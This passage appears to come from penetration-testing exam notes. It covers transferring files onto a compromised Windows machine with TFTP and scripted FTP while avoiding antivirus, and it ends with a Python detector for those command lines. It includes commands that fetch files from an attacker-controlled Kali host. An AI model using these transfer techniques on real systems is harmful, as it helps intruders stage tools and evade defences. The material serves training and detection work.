Antivirus may be triggered by an upload, so be careful when transferring files. One of OffSec's favourite ways to avoid AV is to use legitimate administrative tools during the post-exploitation phase.
Unix environments will often have tools such as nc, curl and wget preinstalled, making file transfer simple. However, on Windows, the process is not as straightforward.
Most netcat-like connections provide a non-interactive shell. Interactive commands like ftp on Windows won't work, so we have to transfer files using non-interactive methods.
Windows XP and 2003. On Windows 7, 2008 and above, the tftp client will need to be explicitly added during installation.
Easy, but slow speed of 2kb/sec
On Kali:
mkdir /tftp # DIRECTORY HOSTING FILES
atftpd --daemon --port 69 /tftp
On Windows:
tftp -i [kali ip] get [file]
All Windows.
Fast speed of 206kb/sec. Scripts available in OSCP-Notes/scripts
On Kali:
#!/bin/bash
apt update && apt install pure-ftpd
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome # use user offsec when logging into ftp
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome # DIRECTORY HOSTING FILES
chown -R ftpuser:ftpgroup /ftphome/
service pure-ftpd restart
On Windows:
rem ftp.txt holds the FTP commands: user offsec, password ftp, binary mode, then the download
echo open [kali ip] 21> ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin>> ftp.txt
echo GET [file]>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
rem or, as a single line:
echo open [kali ip] 21>ftp.txt&echo USER offsec>>ftp.txt&echo ftp>>ftp.txt&echo bin>>ftp.txt&echo GET [file]>>ftp.txt&echo bye>>ftp.txt&ftp -v -n -s:ftp.txt
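Seen from the monitoring side, both methods above leave recognisable command lines: ftp reading its commands from a file with -s:, and tftp -i ... get. The following Python is an added example, not part of the original notes; it flags those patterns in process command lines, and the sample log lines, rule names and the detect function are constructed for illustration.

```python
import re

# Constructed command lines in the order a process-creation log (for example
# Sysmon Event ID 1) might record them; addresses and file names are placeholders.
# Assumption: each command was launched as "cmd.exe /c ...", otherwise the echo
# builtin never appears as its own log entry.
SAMPLE_CMDLINES = [
    "cmd.exe /c echo open 192.0.2.10 21> ftp.txt",
    "cmd.exe /c echo USER offsec>> ftp.txt",
    "cmd.exe /c echo GET tool.exe>> ftp.txt",
    "cmd.exe /c ftp -v -n -s:ftp.txt",
    "cmd.exe /c tftp -i 192.0.2.10 get tool.exe",
    "ftp.exe ftp.example.com",            # interactive session, no script
    "cmd.exe /c echo hello> notes.txt",   # unrelated echo redirect
    "ftp -s:backup.txt",                  # scripted, but script not seen being built
]

START = r'(?:^|[\s&"\\])'   # the binary name must start a token
# echo <FTP verb> ... > or >> <file>
ECHO_FTP = re.compile(r'\becho\s+(open|user|bin|get|put|bye)\b[^&|]*?>{1,2}\s*([^\s&|]+)', re.I)
# ftp ... -s:<file>  (commands read from a file, no prompts)
FTP_SCRIPT = re.compile(START + r'ftp(?:\.exe)?"?\s[^&|]*?-s:"?([^\s"&|]+)', re.I)
# tftp -i <host> get|put <file>
TFTP_XFER = re.compile(START + r'tftp(?:\.exe)?"?\s[^&|]*?-i\s+(\S+)\s+(get|put)\s+([^\s&|]+)', re.I)

def detect(cmdlines):
    """Return (index, rule, detail) for every suspicious command line."""
    staged = {}     # script file -> FTP verbs echoed into it so far
    findings = []
    for i, line in enumerate(cmdlines):
        for verb, path in ECHO_FTP.findall(line):
            staged.setdefault(path.lower(), set()).add(verb.lower())
        m = FTP_SCRIPT.search(line)
        if m:
            script = m.group(1)
            verbs = staged.get(script.lower(), set())
            built = "open" in verbs and bool(verbs & {"get", "put"})
            findings.append((i, "ftp_script_built_by_echo" if built else "ftp_script", script))
        m = TFTP_XFER.search(line)
        if m:
            host, verb, name = m.groups()
            findings.append((i, "tftp_transfer", f"{verb.lower()} {name} via {host}"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_CMDLINES):
        print(finding)
```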
Windows XP, 2003